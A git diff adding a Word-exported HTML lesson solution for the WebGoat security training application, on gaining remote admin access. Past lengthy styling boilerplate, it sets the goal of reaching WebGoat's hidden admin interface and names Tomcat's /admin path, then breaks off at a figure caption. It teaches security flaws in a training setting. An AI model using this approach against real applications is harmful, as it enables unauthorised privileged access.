index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ReflectedXSS_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/RemoteAdminFlaw.html b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw.html
new file mode 100644
index 000000000..09c5164d1
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/RemoteAdminFlaw.html
@@ -0,0 +1,666 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>21</o:TotalTime>
+  <o:Created>2007-07-11T10:44:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:32:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>216</o:Words>
+  <o:Characters>1234</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>10</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1448</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> Remote
+Admin Access<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Applications
+will often have an administrative interface that allows privileged users access
+to functionality that normal users shouldn't see. The application server will
+often have an admin interface as well. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try to access
+the administrative interface for WebGoat. You may also try to access the
+administrative interface for Tomcat. The Tomcat admin interface can be accessed
+via a URL (/admin) and will not count towards the completion of this lesson. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_451" o:spid="_x0000_i1027" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image002.jpg" v:shapes="Picture_x0020_451"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 7</p>
+
